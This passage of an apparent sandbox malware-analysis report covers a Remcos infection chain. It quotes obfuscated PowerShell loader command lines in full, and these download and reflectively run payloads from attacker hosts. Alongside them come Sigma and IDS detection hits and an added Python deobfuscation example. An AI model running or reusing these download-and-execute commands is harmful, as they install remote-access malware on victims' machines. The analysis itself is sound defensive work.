                    Source: Process startedAuthor: Margaritis Dimitrios (idea), Florian Roth (Nextron Systems), oscd.community: Data: Command: "C:\Windows\System32\WScript.exe" "C:\Users\user\AppData\Roaming\bestofthingswithentiretimegivenebstthignstodowithg.vBs" , CommandLine: "C:\Windows\System32\WScript.exe" "C:\Users\user\AppData\Roaming\bestofthingswithentiretimegivenebstthignstodowithg.vBs" , CommandLine|base64offset|contains: , Image: C:\Windows\SysWOW64\wscript.exe, NewProcessName: C:\Windows\SysWOW64\wscript.exe, OriginalFileName: C:\Windows\SysWOW64\wscript.exe, ParentCommandLine: "C:\Windows\sysTEm32\WInDowSpoWeRShell\V1.0\POwersheLL.exE" "powErsHEll.eXE -EX BYpaSs -noP -W 1 -C dEViCEcReDEntIaLDEployMENt ; IeX($(iEX('[SYsTem.tExT.EnCoDINg]'+[ChAR]0x3a+[ChaR]0x3a+'utF8.GeTSTrING([SystEM.cOnvERt]'+[CHAR]0x3a+[cHAR]58+'FrOMbASe64STrING('+[CHAr]34+'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'+[cHaR]0x22+'))')))", ParentImage: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, ParentProcessId: 7492, ParentProcessName: powershell.exe, ProcessCommandLine: "C:\Windows\System32\WScript.exe" "C:\Users\user\AppData\Roaming\bestofthingswithentiretimegivenebstthignstodowithg.vBs" , ProcessId: 7864, ProcessName: wscript.exe
                    Source: Process startedAuthor: frack113: Data: Command: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -command $Codigo = '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';$OWjuxd = [system.Text.encoding]::UTF8.GetString([system.Convert]::Frombase64String($codigo));powershell.exe -windowstyle hidden -executionpolicy bypass -NoProfile -command $OWjuxD, CommandLine: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -command $Codigo = 'KCgnMmtkaW1hZycrJ2VVcmwgPSBlQzRodHRwczovLzMxMDUuZmlsZW1haWwuY29tL2FwaS9maWxlLycrJ2dldD9maWxla2V5PXMnKydoVFBIYkNQWDhvLWxPdENxSExHNl8weEN5LXhsNHRueGxBVmJROTUtJysnZHZpVEs1Y0FSYU5kUWpiYjNtZXhmd1F6S21UWGcmc2tpcHJlZz10cnVlJnBrX3ZpZD1lMDEwOTYzOGM5YmZiOTU3MTczMjUzMTMwOWI1ZmY3YyBlQzQ7Mmtkd2ViQ2xpZW50ID0gTmV3LU9iamVjdCBTeXN0ZW0uTmV0LldlYkNsaWVudDsya2RpbWFnZUJ5dGVzID0gMmtkd2ViQ2xpZW50LkRvdycrJ24nKydsb2FkRGF0YSgya2RpbWFnZVVybCk7MmtkaW1hZ2VUZXh0ID0gJysnW1N5c3RlbS5UZScrJ3h0LkVuY29kaW5nXTo6VVRGOC5HZXRT
                    Source: Process startedAuthor: Florian Roth (Nextron Systems), X__Junior (Nextron Systems): Data: Command: "C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\user\AppData\Local\Temp\blaytqul\blaytqul.cmdline", CommandLine: "C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\user\AppData\Local\Temp\blaytqul\blaytqul.cmdline", CommandLine|base64offset|contains: zw, Image: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe, NewProcessName: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe, OriginalFileName: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe, ParentCommandLine: "C:\Windows\sysTEm32\WInDowSpoWeRShell\V1.0\POwersheLL.exE" "powErsHEll.eXE -EX BYpaSs -noP -W 1 -C dEViCEcReDEntIaLDEployMENt ; IeX($(iEX('[SYsTem.tExT.EnCoDINg]'+[ChAR]0x3a+[ChaR]0x3a+'utF8.GeTSTrING([SystEM.cOnvERt]'+[CHAR]0x3a+[cHAR]58+'FrOMbASe64STrING('+[CHAr]34+'JFM1UFpiNiAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgID0gICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICBhZEQtVHlwZSAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIC1NRW1iZVJERUZpTkl0aU9uICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgJ1tEbGxJbXBvcnQoInVyTE1PTi5EbGwiLCAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIENoYXJTZXQgPSBDaGFyU2V0LlVuaWNvZGUpXXB1YmxpYyBzdGF0aWMgZXh0ZXJuIEludFB0ciBVUkxEb3dubG9hZFRvRmlsZShJbnRQdHIgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICBaLHN0cmluZyAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIGhwSGhsTndBLHN0cmluZyAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIFRSdEdKUEJ0ZSx1aW50ICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgaEFVYVRQUSxJbnRQdHIgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICBjTWFReEFTWWhsSyk7JyAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIC1OQU1FICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgInhaQm5VRSIgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAtTmFNRXNQYWNlICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgQ0NzVWlPTklmICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgLVBhc3NUaHJ1OyAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICRTNVBaYjY6OlVSTE
Rvd25sb2FkVG9GaWxlKDAsImh0dHA6Ly8xMDQuMTY4LjQ2LjI2LzE0MjIvYmVzdG9mdGhpbmdzd2l0aGVudGlyZXRpbWVnaXZlbmVic3R0aGlnbnN0b2Rvd2l0aGdyZWF0LnRJRiIsIiRFblY6QVBQREFUQVxiZXN0b2Z0aGluZ3N3aXRoZW50aXJldGltZWdpdmVuZWJzdHRoaWduc3RvZG93aXRoZy52QnMiLDAsMCk7U3RhclQtc2xFRVAoMyk7SWkgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAiJGVuVjpBUFBEQVRBXGJlc3RvZnRoaW5nc3dpdGhlbnRpcmV0aW1lZ2l2ZW5lYnN0dGhpZ25zdG9kb3dpdGhnLnZCcyI='+[cHaR]0x22+'))')))", ParentImage: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, ParentProcessId: 7492, ParentProcessName: powershell.exe, ProcessCommandLine: "C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\user\AppData\Local\Temp\blaytqul\blaytqul.cmdline", ProcessId: 7760, ProcessName: csc.exe
                    Source: File created | Author: frack113, Nasreddine Bencherchali (Nextron Systems) | Data: EventID: 11, Image: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, ProcessId: 7492, TargetFilename: C:\Users\user\AppData\Roaming\bestofthingswithentiretimegivenebstthignstodowithg.vBs
                    Source: Process startedAuthor: James Pemberton / @4A616D6573, Endgame, JHasenbusch, oscd.community, Austin Songer @austinsonger: Data: Command: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -windowstyle hidden -executionpolicy bypass -NoProfile -command "(('2kdimag'+'eUrl = eC4https://3105.filemail.com/api/file/'+'get?filekey=s'+'hTPHbCPX8o-lOtCqHLG6_0xCy-xl4tnxlAVbQ95-'+'dviTK5cARaNdQjbb3mexfwQzKmTXg&skipreg=true&pk_vid=e0109638c9bfb9571732531309b5ff7c eC4;2kdwebClient = New-Object System.Net.WebClient;2kdimageBytes = 2kdwebClient.Dow'+'n'+'loadData(2kdimageUrl);2kdimageText = '+'[System.Te'+'xt.Encoding]::UTF8.GetString(2kdimageBytes'+');2kdstartFlag = eC4<<BASE64_START>>eC'+'4;2kdendFlag = eC4<<BASE64_END>>eC4;2kdstartIndex = 2kdimageText.IndexOf(2kdstartFlag);2kde'+'n'+'dIndex = 2kdimageText.Index'+'Of(2kdendFla'+'g);2kdstartIndex -ge 0 -and 2kdendIndex -gt 2kdstar'+'tIndex;2kdstartIndex += 2kdstartFlag.Lengt'+'h;2kdbase64Length = 2kdendIndex - 2kdstartIndex;2kdbase64Command = 2k'+'dimageT'+'ext.Substring(2kdstartIndex, 2kdbase64Length);2kdbase64Re'+'versed = -join (2kdbase64Command.ToCharArray() syV ForEach-Object { 2kd_ })[-1..-(2kdbase64Command.Length)];2kdcommandBytes = [System.Convert]::FromBas'+'e64String(2kdbase64Reversed);2kdloadedAssembly = [System.Reflection.Assembly]::Load(2kdcommandBytes);2kdvaiMethod = [dnlib.IO.Home].GetMethod(eC4VAIeC4);2kdvaiMethod.Invoke('+'2kdnull, @(eC4txt.FGVGFR/2241/62.64.8'+'61.401//:pttheC4, eC4desativadoeC4, eC4desativadoeC4, eC4desativadoeC4,'+' eC4CasPoleC4, eC4desativadoeC4, eC4desativadoeC4,eC'+'4desativado'+'eC4,eC4desati'+'vadoeC4,eC4desativadoeC4,eC4desativadoeC4,eC4desativadoeC'+'4,eC41eC4,eC4desativadoeC4));') -creplACe ([chAR]115+[chAR]121+[chAR]86),[chAR]124 -RePLAce ([chAR]50+[chAR]107+[chAR]100),[chAR]36 -creplACe'eC4',[chAR]39)| .((gv '*MDr*').NAMe[3,11,2]-jOiN'')", CommandLine: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -windowstyle hidden -executionpolicy 
bypass -NoProfile -command "(('2kdimag'+'eUrl = eC4https://3105.filemail.com/api/file/'+'get?filekey=s'+'hTPHbCPX8o-lOtCqHLG6_0xCy-xl4tnxlAVbQ95-'+'dviTK5cARaNdQjbb3mexfwQzKmTXg&skipreg=true&pk_vid=e0109638c9bfb9571732531309b5ff7c eC4;2kdwebClient = New-Object System.Net.WebClient;2kdimageBytes = 2kdwebClient.Dow'+'n'+'loadData(2kdimageUrl);2kdimageText = '+'[System.Te'+'xt.Encoding]::UTF8.GetString(2kdimageBytes'+');2kdstartFlag = eC4<<BASE64_START>>eC'+'4;2kdendFlag = eC4<<BASE64_END>>eC4;2kdstartIndex = 2kdimageText.IndexOf(2kdstartFlag);2kde'+'n'+'dIndex = 2kdimageText.Index'+'Of(2kdendFla'+'g);2kdstartIndex -ge 0 -and 2kdendIndex -gt 2kdstar'+'tIndex;2kdstartIndex += 2kdstartFlag.Lengt'+'h;2kdbase64Length = 2kdendIndex - 2kdstartIndex;2kdbase64Command = 2k'+'dimageT'+'ext.Substring(2kdstartIndex, 2kdbase64Length);2kdbase64Re'+'versed = -join (2kdbase64Command.ToCharArray() syV ForEach-Object { 2kd_ })[-1..-(2kdbase64Command.Length)];2kdcommandBytes = [System.Convert]::FromBas'+'e64String(2kdbase64Reversed);2kdloadedAssembly = [System.Reflection.Assembly]::Load(2kdcommandBytes);2kdvaiMethod = [dnlib.IO.Home].GetMethod(eC4VAIeC4
                    Source: Process startedAuthor: Michael Haag: Data: Command: "C:\Windows\System32\WScript.exe" "C:\Users\user\AppData\Roaming\bestofthingswithentiretimegivenebstthignstodowithg.vBs" , CommandLine: "C:\Windows\System32\WScript.exe" "C:\Users\user\AppData\Roaming\bestofthingswithentiretimegivenebstthignstodowithg.vBs" , CommandLine|base64offset|contains: , Image: C:\Windows\SysWOW64\wscript.exe, NewProcessName: C:\Windows\SysWOW64\wscript.exe, OriginalFileName: C:\Windows\SysWOW64\wscript.exe, ParentCommandLine: "C:\Windows\sysTEm32\WInDowSpoWeRShell\V1.0\POwersheLL.exE" "powErsHEll.eXE -EX BYpaSs -noP -W 1 -C dEViCEcReDEntIaLDEployMENt ; IeX($(iEX('[SYsTem.tExT.EnCoDINg]'+[ChAR]0x3a+[ChaR]0x3a+'utF8.GeTSTrING([SystEM.cOnvERt]'+[CHAR]0x3a+[cHAR]58+'FrOMbASe64STrING('+[CHAr]34+'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'+[cHaR]0x22+'))')))", ParentImage: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, ParentProcessId: 7492, ParentProcessName: powershell.exe, ProcessCommandLine: "C:\Windows\System32\WScript.exe" "C:\Users\user\AppData\Roaming\bestofthingswithentiretimegivenebstthignstodowithg.vBs" , ProcessId: 7864, ProcessName: wscript.exe
                    Source: File created | Author: frack113 | Data: EventID: 11, Image: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, ProcessId: 7492, TargetFilename: C:\Users\user\AppData\Local\Temp\blaytqul\blaytqul.cmdline
                    Source: Process startedAuthor: Roberto Rodriguez @Cyb3rWard0g (rule), oscd.community (improvements): Data: Command: "C:\Windows\sysTEm32\WInDowSpoWeRShell\V1.0\POwersheLL.exE" "powErsHEll.eXE -EX BYpaSs -noP -W 1 -C dEViCEcReDEntIaLDEployMENt ; IeX($(iEX('[SYsTem.tExT.EnCoDINg]'+[ChAR]0x3a+[ChaR]0x3a+'utF8.GeTSTrING([SystEM.cOnvERt]'+[CHAR]0x3a+[cHAR]58+'FrOMbASe64STrING('+[CHAr]34+'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'+[cHaR]0x22+'))')))", CommandLine: "C:\Windows\sysTEm32\WInDowSpoWeRShell\V1.0\POwersheLL.exE" "powErsHEll.eXE -EX BYpaSs -noP -W 1 -C dEViCEcReDEntIaLDEployMENt ; IeX($(iEX('[SYsTem.tExT.EnCoDINg]'+[ChAR]0x3a+[ChaR]0x3a+'utF8.GeTSTrING([SystEM.cOnvERt]'+[CHAR]0x3a+[cHAR]58+'FrOMbASe64STrING('+[CHAr]34+'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
                    Source: Process startedAuthor: Teymur Kheirkhabarov (idea), Vasiliy Burov (rule), oscd.community, Tim Shelton: Data: Command: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -windowstyle hidden -executionpolicy bypass -NoProfile -command "(('2kdimag'+'eUrl = eC4https://3105.filemail.com/api/file/'+'get?filekey=s'+'hTPHbCPX8o-lOtCqHLG6_0xCy-xl4tnxlAVbQ95-'+'dviTK5cARaNdQjbb3mexfwQzKmTXg&skipreg=true&pk_vid=e0109638c9bfb9571732531309b5ff7c eC4;2kdwebClient = New-Object System.Net.WebClient;2kdimageBytes = 2kdwebClient.Dow'+'n'+'loadData(2kdimageUrl);2kdimageText = '+'[System.Te'+'xt.Encoding]::UTF8.GetString(2kdimageBytes'+');2kdstartFlag = eC4<<BASE64_START>>eC'+'4;2kdendFlag = eC4<<BASE64_END>>eC4;2kdstartIndex = 2kdimageText.IndexOf(2kdstartFlag);2kde'+'n'+'dIndex = 2kdimageText.Index'+'Of(2kdendFla'+'g);2kdstartIndex -ge 0 -and 2kdendIndex -gt 2kdstar'+'tIndex;2kdstartIndex += 2kdstartFlag.Lengt'+'h;2kdbase64Length = 2kdendIndex - 2kdstartIndex;2kdbase64Command = 2k'+'dimageT'+'ext.Substring(2kdstartIndex, 2kdbase64Length);2kdbase64Re'+'versed = -join (2kdbase64Command.ToCharArray() syV ForEach-Object { 2kd_ })[-1..-(2kdbase64Command.Length)];2kdcommandBytes = [System.Convert]::FromBas'+'e64String(2kdbase64Reversed);2kdloadedAssembly = [System.Reflection.Assembly]::Load(2kdcommandBytes);2kdvaiMethod = [dnlib.IO.Home].GetMethod(eC4VAIeC4);2kdvaiMethod.Invoke('+'2kdnull, @(eC4txt.FGVGFR/2241/62.64.8'+'61.401//:pttheC4, eC4desativadoeC4, eC4desativadoeC4, eC4desativadoeC4,'+' eC4CasPoleC4, eC4desativadoeC4, eC4desativadoeC4,eC'+'4desativado'+'eC4,eC4desati'+'vadoeC4,eC4desativadoeC4,eC4desativadoeC4,eC4desativadoeC'+'4,eC41eC4,eC4desativadoeC4));') -creplACe ([chAR]115+[chAR]121+[chAR]86),[chAR]124 -RePLAce ([chAR]50+[chAR]107+[chAR]100),[chAR]36 -creplACe'eC4',[chAR]39)| .((gv '*MDr*').NAMe[3,11,2]-jOiN'')", CommandLine: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -windowstyle hidden -executionpolicy bypass -NoProfile 
-command "(('2kdimag'+'eUrl = eC4https://3105.filemail.com/api/file/'+'get?filekey=s'+'hTPHbCPX8o-lOtCqHLG6_0xCy-xl4tnxlAVbQ95-'+'dviTK5cARaNdQjbb3mexfwQzKmTXg&skipreg=true&pk_vid=e0109638c9bfb9571732531309b5ff7c eC4;2kdwebClient = New-Object System.Net.WebClient;2kdimageBytes = 2kdwebClient.Dow'+'n'+'loadData(2kdimageUrl);2kdimageText = '+'[System.Te'+'xt.Encoding]::UTF8.GetString(2kdimageBytes'+');2kdstartFlag = eC4<<BASE64_START>>eC'+'4;2kdendFlag = eC4<<BASE64_END>>eC4;2kdstartIndex = 2kdimageText.IndexOf(2kdstartFlag);2kde'+'n'+'dIndex = 2kdimageText.Index'+'Of(2kdendFla'+'g);2kdstartIndex -ge 0 -and 2kdendIndex -gt 2kdstar'+'tIndex;2kdstartIndex += 2kdstartFlag.Lengt'+'h;2kdbase64Length = 2kdendIndex - 2kdstartIndex;2kdbase64Command = 2k'+'dimageT'+'ext.Substring(2kdstartIndex, 2kdbase64Length);2kdbase64Re'+'versed = -join (2kdbase64Command.ToCharArray() syV ForEach-Object { 2kd_ })[-1..-(2kdbase64Command.Length)];2kdcommandBytes = [System.Convert]::FromBas'+'e64String(2kdbase64Reversed);2kdloadedAssembly = [System.Reflection.Assembly]::Load(2kdcommandBytes);2kdvaiMethod = [dnlib.IO.Home].GetMethod(eC4VAIeC4

                    Data Obfuscation

                    Source: Process startedAuthor: Joe Security: Data: Command: "C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\user\AppData\Local\Temp\blaytqul\blaytqul.cmdline", CommandLine: "C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\user\AppData\Local\Temp\blaytqul\blaytqul.cmdline", CommandLine|base64offset|contains: zw, Image: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe, NewProcessName: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe, OriginalFileName: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe, ParentCommandLine: "C:\Windows\sysTEm32\WInDowSpoWeRShell\V1.0\POwersheLL.exE" "powErsHEll.eXE -EX BYpaSs -noP -W 1 -C dEViCEcReDEntIaLDEployMENt ; IeX($(iEX('[SYsTem.tExT.EnCoDINg]'+[ChAR]0x3a+[ChaR]0x3a+'utF8.GeTSTrING([SystEM.cOnvERt]'+[CHAR]0x3a+[cHAR]58+'FrOMbASe64STrING('+[CHAr]34+'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'+[cHaR]0x22+'))')))", ParentImage: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, ParentProcessId: 7492, ParentProcessName: powershell.exe, ProcessCommandLine: "C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\user\AppData\Local\Temp\blaytqul\blaytqul.cmdline", ProcessId: 7760, ProcessName: csc.exe
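The second-stage PowerShell recorded in the Sigma entries above hides its script behind three string substitutions ('2kd' stands for $, 'eC4' for the single quote, 'syV' for the pipe), spells its invoker with a variable-name index trick instead of writing iex, then fetches a text file, cuts out a marker-delimited reversed base64 blob and reflectively loads the decoded assembly. The Python below is an added example, not Joe Sandbox output and not the sample's own code: it replays those steps offline. The command line is copied from the report; the downloaded file content, the table of variable names and the "VT" reversed-MZ heuristic are constructed for this example and are not the ET rule's detection logic.

```python
import base64
import fnmatch
import re

# Second-stage PowerShell command line, copied from the Sigma entries in this report
# (the text after -command). Everything else in this file is an added example.
OBFUSCATED_COMMAND = (
    "(('2kdimag'+'eUrl = eC4https://3105.filemail.com/api/file/'+'get?filekey=s'+'hTPHbCPX8o-lOtCqHLG6_0xCy-xl4tnxlAVbQ95-'"
    "+'dviTK5cARaNdQjbb3mexfwQzKmTXg&skipreg=true&pk_vid=e0109638c9bfb9571732531309b5ff7c eC4;2kdwebClient = New-Object "
    "System.Net.WebClient;2kdimageBytes = 2kdwebClient.Dow'+'n'+'loadData(2kdimageUrl);2kdimageText = '+'[System.Te'"
    "+'xt.Encoding]::UTF8.GetString(2kdimageBytes'+');2kdstartFlag = eC4<<BASE64_START>>eC'+'4;2kdendFlag = eC4<<BASE64_END>>eC4;"
    "2kdstartIndex = 2kdimageText.IndexOf(2kdstartFlag);2kde'+'n'+'dIndex = 2kdimageText.Index'+'Of(2kdendFla'+'g);"
    "2kdstartIndex -ge 0 -and 2kdendIndex -gt 2kdstar'+'tIndex;2kdstartIndex += 2kdstartFlag.Lengt'+'h;"
    "2kdbase64Length = 2kdendIndex - 2kdstartIndex;2kdbase64Command = 2k'+'dimageT'+'ext.Substring(2kdstartIndex, 2kdbase64Length);"
    "2kdbase64Re'+'versed = -join (2kdbase64Command.ToCharArray() syV ForEach-Object { 2kd_ })[-1..-(2kdbase64Command.Length)];"
    "2kdcommandBytes = [System.Convert]::FromBas'+'e64String(2kdbase64Reversed);2kdloadedAssembly = "
    "[System.Reflection.Assembly]::Load(2kdcommandBytes);2kdvaiMethod = [dnlib.IO.Home].GetMethod(eC4VAIeC4);"
    "2kdvaiMethod.Invoke('+'2kdnull, @(eC4txt.FGVGFR/2241/62.64.8'+'61.401//:pttheC4, eC4desativadoeC4, eC4desativadoeC4, "
    "eC4desativadoeC4,'+' eC4CasPoleC4, eC4desativadoeC4, eC4desativadoeC4,eC'+'4desativado'+'eC4,eC4desati'+'vadoeC4,"
    "eC4desativadoeC4,eC4desativadoeC4,eC4desativadoeC'+'4,eC41eC4,eC4desativadoeC4));') "
    "-creplACe ([chAR]115+[chAR]121+[chAR]86),[chAR]124 -RePLAce ([chAR]50+[chAR]107+[chAR]100),[chAR]36 "
    "-creplACe'eC4',[chAR]39)| .((gv '*MDr*').NAMe[3,11,2]-jOiN'')"
)

_STRING_TOKEN = re.compile(r"'([^']*)'|\[char\](0x[0-9a-f]+|\d+)", re.I)
_REPLACE_OP = re.compile(
    r"-(c?)replace\s*(\([^)]*\)|'[^']*'|\[char\]\w+)\s*,\s*(\([^)]*\)|'[^']*'|\[char\]\w+)", re.I)
# Constructed subset of Windows PowerShell built-in variable names, enough for the (gv '*MDr*') trick.
_KNOWN_VARIABLES = ["MaximumAliasCount", "MaximumDriveCount", "MaximumErrorCount",
                    "MaximumFunctionCount", "MaximumHistoryCount", "MaximumVariableCount"]


def pwsh_string(expr):
    """Evaluate an expression made only of 'literal' pieces and [char]N joined by '+'."""
    return "".join(m.group(1) if m.group(1) is not None else chr(int(m.group(2), 0))
                   for m in _STRING_TOKEN.finditer(expr))


def deobfuscate(cmd):
    """Undo "('..'+'..') -replace a,b -creplace c,d": build the string, then apply each
    substitution in order. -replace is a case-insensitive regex, -creplace is case-sensitive."""
    end = re.search(r"'\)\s*-c?replace", cmd, re.I)
    if end is None:
        raise ValueError("no (string) -replace construct found")
    text = pwsh_string(cmd[:end.start() + 1])
    for op in _REPLACE_OP.finditer(cmd[end.start() + 1:]):
        pattern, repl = pwsh_string(op.group(2)), pwsh_string(op.group(3))
        text = re.sub(pattern, lambda _m, r=repl: r, text, flags=0 if op.group(1) else re.I)
    return text


def resolve_invoker(cmd):
    """Resolve (gv '<glob>').Name[i,j,k] -join '' to the command name it spells."""
    m = re.search(r"gv\s+'([^']+)'\)\.name\[([\d,\s]+)\]", cmd, re.I)
    if m is None:
        return None
    names = [n for n in _KNOWN_VARIABLES if fnmatch.fnmatchcase(n.lower(), m.group(1).lower())]
    if len(names) != 1:
        raise ValueError(f"glob {m.group(1)!r} matched {names}")
    return "".join(names[0][int(i)] for i in m.group(2).split(","))


def invoke_arguments(script):
    """String arguments handed to the reflective .Invoke($null, @(...)) call."""
    m = re.search(r"\.Invoke\(\$null,\s*@\((.*?)\)\)", script, re.S)
    return re.findall(r"'([^']*)'", m.group(1)) if m else []


def extract_payload(downloaded_text, start="<<BASE64_START>>", end="<<BASE64_END>>"):
    """Mirror the loader: text between the markers, reversed, then base64-decoded. The sample
    evaluates its index check but never acts on it; here a bad layout returns None."""
    s, e = downloaded_text.find(start), downloaded_text.find(end)
    if s < 0 or e <= s:
        return None
    return base64.b64decode(downloaded_text[s + len(start):e][::-1])


def looks_like_reversed_mz(blob):
    """Heuristic of this example only: base64 of a PE begins with 'TV' whatever the third
    byte is, so a reversed-base64 PE blob ends with 'VT'."""
    return blob.strip().endswith("VT")


# Constructed stand-in for the fetched file; FAKE_PE only carries the MZ magic, nothing runs.
FAKE_PE = b"MZ" + b"\x00" * 62 + b"constructed stand-in, not a real executable"
REVERSED_BLOB = base64.b64encode(FAKE_PE).decode()[::-1]
CONSTRUCTED_DOWNLOAD = "GIF89a filler <<BASE64_START>>" + REVERSED_BLOB + "<<BASE64_END>> trailer"

if __name__ == "__main__":
    script = deobfuscate(OBFUSCATED_COMMAND)
    args = invoke_arguments(script)
    print(script[:80] + "...")
    print("invoker:", resolve_invoker(OBFUSCATED_COMMAND))
    print("next stage:", args[0][::-1], "| host process:", args[4])
    payload = extract_payload(CONSTRUCTED_DOWNLOAD)
    print("MZ:", payload[:2] == b"MZ", "| reversed-MZ heuristic:", looks_like_reversed_mz(REVERSED_BLOB))
```

Run stand-alone, it prints the recovered script prefix, the invoker (iex), the reversed next-stage URL http://104.168.46.26/1422/RFGVGF.txt, which is the GET /1422/RFGVGF.txt request in the Networking section, and the fifth Invoke argument, CasPol, consistent with the report extracting the Remcos configuration from CasPol.exe memory. Replaying the substitutions rather than pattern-matching on 2kd or eC4 matters because those tokens change per build; the structure (concatenation, ordered -replace operators, the gv index trick) is what stays constant.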

                    Stealing of Sensitive Information

                    Source: Registry Key set | Author: Joe Security | Data: Details: F3 E4 18 5A 10 18 60 73 71 CA 92 6C CF BA 0D C7 70 A9 83 0C BC 9C E3 09 15 6B C7 E9 29 02 5F 56 C7 9C 21 5C 15 31 4B ED 6F 4A E7 05 D3 DC 23 36 C1 98 FC B2 C8 8F 6B 35 7C D7 56 AF 23 69 76 CF EB CC D5 82 B6 E3 5C 13 63 80 FA DB 2F 66 9A 8C 9E C1 D5 47 29 87 2A 94 E4 D4 42 95 06 A5 A5 56 BB 67 A5 6F BE 87 C9 AF B9 7A 8F 51 DD 2F 2F CA 76 6A , EventID: 13, EventType: SetValue, Image: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe, ProcessId: 5480, TargetObject: HKEY_CURRENT_USER\SOFTWARE\Rmc-EC111K\exepath
                    Timestamp | SID | Severity | Classtype | Source IP | Source Port | Destination IP | Destination Port | Protocol
                    2024-11-26T09:44:46.955074+0100 | 2020425 | 1 | Exploit Kit Activity Detected | 104.168.46.26 | 80 | 192.168.2.4 | 49738 | TCP
                    2024-11-26T09:44:46.955074+0100 | 2020424 | 1 | Exploit Kit Activity Detected | 104.168.46.26 | 80 | 192.168.2.4 | 49738 | TCP
                    2024-11-26T09:44:58.938984+0100 | 2036594 | 1 | Malware Command and Control Activity Detected | 192.168.2.4 | 49739 | 192.169.69.26 | 14645 | TCP
                    2024-11-26T09:45:10.456136+0100 | 2036594 | 1 | Malware Command and Control Activity Detected | 192.168.2.4 | 49740 | 192.169.69.26 | 14645 | TCP
                    2024-11-26T09:45:22.004452+0100 | 2036594 | 1 | Malware Command and Control Activity Detected | 192.168.2.4 | 49743 | 192.169.69.26 | 14645 | TCP
                    2024-11-26T09:45:33.642369+0100 | 2036594 | 1 | Malware Command and Control Activity Detected | 192.168.2.4 | 49769 | 192.169.69.26 | 14645 | TCP
                    2024-11-26T09:45:45.143923+0100 | 2036594 | 1 | Malware Command and Control Activity Detected | 192.168.2.4 | 49795 | 192.169.69.26 | 14645 | TCP
                    2024-11-26T09:45:56.640094+0100 | 2036594 | 1 | Malware Command and Control Activity Detected | 192.168.2.4 | 49821 | 192.169.69.26 | 14645 | TCP
                    2024-11-26T09:46:08.570874+0100 | 2036594 | 1 | Malware Command and Control Activity Detected | 192.168.2.4 | 49850 | 192.169.69.26 | 14645 | TCP
                    2024-11-26T09:46:20.192797+0100 | 2036594 | 1 | Malware Command and Control Activity Detected | 192.168.2.4 | 49876 | 192.169.69.26 | 14645 | TCP
                    2024-11-26T09:46:31.772603+0100 | 2036594 | 1 | Malware Command and Control Activity Detected | 192.168.2.4 | 49904 | 192.169.69.26 | 14645 | TCP
                    2024-11-26T09:46:43.329673+0100 | 2036594 | 1 | Malware Command and Control Activity Detected | 192.168.2.4 | 49929 | 192.169.69.26 | 14645 | TCP
                    2024-11-26T09:46:54.967037+0100 | 2036594 | 1 | Malware Command and Control Activity Detected | 192.168.2.4 | 49955 | 192.169.69.26 | 14645 | TCP
                    2024-11-26T09:47:06.569998+0100 | 2036594 | 1 | Malware Command and Control Activity Detected | 192.168.2.4 | 49980 | 192.169.69.26 | 14645 | TCP
                    2024-11-26T09:47:18.496446+0100 | 2036594 | 1 | Malware Command and Control Activity Detected | 192.168.2.4 | 50007 | 192.169.69.26 | 14645 | TCP
                    2024-11-26T09:47:30.019357+0100 | 2036594 | 1 | Malware Command and Control Activity Detected | 192.168.2.4 | 50018 | 192.169.69.26 | 14645 | TCP
                    2024-11-26T09:47:41.573419+0100 | 2036594 | 1 | Malware Command and Control Activity Detected | 192.168.2.4 | 50019 | 192.169.69.26 | 14645 | TCP
                    2024-11-26T09:47:53.017292+0100 | 2036594 | 1 | Malware Command and Control Activity Detected | 192.168.2.4 | 50020 | 192.169.69.26 | 14645 | TCP
                    2024-11-26T09:48:04.494276+0100 | 2036594 | 1 | Malware Command and Control Activity Detected | 192.168.2.4 | 50021 | 192.169.69.26 | 14645 | TCP
                    2024-11-26T09:48:16.066157+0100 | 2036594 | 1 | Malware Command and Control Activity Detected | 192.168.2.4 | 50022 | 192.169.69.26 | 14645 | TCP
